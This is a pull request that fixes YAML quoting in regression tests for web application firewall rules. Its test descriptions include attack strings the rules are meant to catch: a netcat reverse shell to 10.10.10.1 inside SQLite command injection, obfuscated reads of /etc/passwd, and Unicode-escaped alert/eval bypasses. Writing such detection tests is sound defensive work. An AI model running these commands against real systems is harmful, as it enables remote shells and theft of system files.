### PR TITLE
fix: test - description escaping

### DIFF
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml
@@ -5,7 +5,7 @@ meta:
 rule_id: 920540
 tests:
   - test_id: 1
-    desc: "Unicode character bypass issue #2512: alert() \u0061lert"
+    desc: 'Unicode character bypass issue #2512: alert() \u0061lert'
     stages:
       - input:
           dest_addr: "127.0.0.1"
@@ -23,7 +23,7 @@ tests:
           log:
             expect_ids: [920540]
   - test_id: 2
-    desc: "Unicode character bypass issue #2512: eval() \u0065val()"
+    desc: 'Unicode character bypass issue #2512: eval() \u0065val()'
     stages:
       - input:
           dest_addr: "127.0.0.1"

--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
@@ -165,7 +165,8 @@ tests:
           log:
             expect_ids: [932200]
   - test_id: 11
-    desc: 'Test first backslash match ([*?`\\''][^/\n]+/) with: c\at /etc/passwd'
+    desc: |
+      Test first backslash match ([*?`\\][^/\n]+/) with: c\at /etc/passwd
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -181,7 +182,8 @@ tests:
           log:
             expect_ids: [932200]
   - test_id: 12
-    desc: 'Test second backslash match (/[^/]+?[*?`\\'']) with: cat /etc/p\asswd'
+    desc: |
+      Test second backslash match (/[^/]+?[*?`\\']) with: cat /etc/p\asswd
     stages:
       - input:
           dest_addr: 127.0.0.1

--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
@@ -165,7 +165,7 @@ tests:
           log:
             expect_ids: [932200]
   - test_id: 11
-    desc: "Test first backslash match ([*?`\\'][^/\n]+/) with: c\at /etc/passwd"
+    desc: 'Test first backslash match ([*?`\\''][^/\n]+/) with: c\at /etc/passwd'
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -181,7 +181,7 @@ tests:
           log:
             expect_ids: [932200]
   - test_id: 12
-    desc: "Test second backslash match (/[^/]+?[*?`\\']) with: cat /etc/p\asswd"
+    desc: 'Test second backslash match (/[^/]+?[*?`\\'']) with: cat /etc/p\asswd'
     stages:
       - input:
           dest_addr: 127.0.0.1

--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml
@@ -5,7 +5,7 @@ meta:
 rule_id: 932210
 tests:
   - test_id: 1
-    desc: ";\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\n"
+    desc: ';\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\n'
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -21,7 +21,7 @@ tests:
           log:
             expect_ids: [932210]
   - test_id: 2
-    desc: "%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n"
+    desc: '%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n'
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -37,7 +37,7 @@ tests:
           log:
             expect_ids: [932210]
   - test_id: 3
-    desc: ";\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n"
+    desc: ';\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n'
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -53,7 +53,7 @@ tests:
           log:
             expect_ids: [932210]
   - test_id: 4
-    desc: ";\n.databases"
+    desc: ';\n.databases'
     stages:
       - input:
           dest_addr: 127.0.0.1

--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml
@@ -38,7 +38,7 @@ tests:
           log:
             expect_ids: [942330]
   - test_id: 3
-    desc: "Test second backslash match (\x5cx(?:23|27|3d))"
+    desc: 'Test second backslash match (\x5cx(?:23|27|3d))'
     stages:
       - input:
           dest_addr: 127.0.0.1


### PR DESCRIPTION
Certain test descriptions contain escape sequences such as `\n` and `\a`.
These should be treated as literals, as opposed to being interpreted by Yaml. 
Changing from double quotes to e.g. block scalar syntax will also fix this, but that may be introducing extra whitespace/newlines which may not be wanted.
Changing to single quotes as I have done keeps the diff as small as possible, though single quotes do need to be escaped with another single quote, as is done in https://github.com/TimDiam0nd/coreruleset/blob/48fd95ef0999e90c1b4dc2a42ed8048c1646e3c2/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml#L168
and https://github.com/TimDiam0nd/coreruleset/blob/48fd95ef0999e90c1b4dc2a42ed8048c1646e3c2/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml#L184

I am also happy to change the above two to block scalar syntax if that is wanted.